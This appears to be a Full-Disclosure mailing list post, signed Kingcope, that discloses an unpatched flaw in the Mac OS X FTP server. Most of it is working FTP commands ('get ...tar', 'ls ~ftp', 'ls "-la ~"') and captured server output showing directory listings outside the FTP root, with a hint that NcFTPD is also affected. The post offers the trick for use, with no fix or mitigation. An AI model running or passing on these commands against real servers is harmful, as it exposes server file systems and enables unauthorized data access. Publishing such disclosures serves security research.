|
MacOS X FTP Server 0day
it was my finding, who carez
ftp <target>
get ...tar
will retrieve all contents of underlying folder of user ftp. (hint:
works with correct user account in latest NcFTPD too)
ftp> ls ~ftp
200 PORT command successful.
150 Opening ASCII mode data connection for /us.
/.hotfiles.btree
/.rnd
/.Trashes
/.vol
/Applications
/automount
/bin
/cores
/Desktop DB
/Desktop DF
/dev
/Developer
/etc
/Groups
/Library
/mach
/mach.sym
/mach_kernel
/Network
/opt
/private
/sbin
/
/System
/tmp
226 Transfer complete.
ftp: 236 bytes received in 0,06Seconds 3,81Kbytes/sec.
ls ~ftp/etc/*/*
ftp> ls "-la ~"
227 Entering Passive Mode ()
150 Opening ASCII mode data connection for directory listing.
total 20011
drwxrwxr-t 34 0 80 1258 Dec 30 17:55 .
drwxrwxr-t 34 0 80 1258 Dec 30 17:55 ..
-rw-r--r-- 1 0 80 6148 Jul 19 2004 .DS_Store
d-wx-wx-wt 2 0 80 68 Jul 19 2004 .Trashes
-rw------- 1 0 80 786432 Sep 5 2007 .hotfiles.btree
-rw------- 1 0 80 1024 Nov 30 2006 .rnd
dr-xr-xr-x 2 0 0 160 Dec 30 17:55 .vol
drwxrwxr-x 35 0 80 1190 May 11 2009 Applications
-rw-r--r-- 1 0 80 29184 Dec 23 2006 Desktop DB
-rw-r--r-- 1 0 80 194178 Dec 23 2006 Desktop DF
drwxrwxr-x 3 0 80 102 May 11 2009 Developer
-rwxr-xr-x 3 501 80 1024 Jun 25 2007 DiskWarrior.dmg
drwxrwxr-x 2 501 80 68 Jul 17 2010 Groups
drwxrwxr-t 53 0 80 1802 Nov 30 2006 Library
drwxr-xr-x 1 0 0 512 Feb 11 11:54 Network
drwxrwxr-x 6 501 80 204 Nov 30 2006 Shared Items
drwxr-xr-x 4 0 0 136 May 11 2009 System
drwxrwxr-t 6 0 80 204 Nov 30 2006 Users
drwxrwxrwt 6 0 80 204 Dec 30 17:55 Volumes
drwxr-xr-x 4 0 80 136 Jun 8 2005 automount
drwxr-xr-x 48 0 0 1632 May 11 2009 bin
drwxr-xr-x 43 0 501 1462 Jun 28 2006 bru
drwxrwxr-t 2 0 80 68 Dec 8 2003 cores
dr-xr-xr-x 2 0 0 512 Dec 30 17:55 dev
lrwxr-xr-x 1 0 4294967294 11 Nov 30 2006 etc -> private/etc
lrwxr-xr-x 1 0 80 9 Dec 30 17:55 mach -> ???
-r--r--r-- 1 0 80 624040 Dec 30 17:55 mach.sym
-rw-r--r-- 1 0 0 8570484 Oct 10 2007 mach_kernel
drwxr-xr-x 3 0 0 102 Nov 4 2005 opt
drwxr-xr-x 6 0 0 204 Dec 30 17:55 private
drwxr-xr-x 64 0 0 2176 May 11 2009 sbin
lrwxr-xr-x 1 0 4294967294 11 Nov 30 2006 tmp -> private/tmp
drwxr-xr-x 10 0 0 340 May 11 2009 usr
lrwxr-xr-x 1 0 4294967294 11 Nov 30 2006 var -> private/var
226 Transfer complete.
ftp> ls "-la ~"
ls "-laR ~" YOU NAME IT! WHOLE DIRTREE OF SERVER
/Kingcope
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
|
推荐
评论(0条)
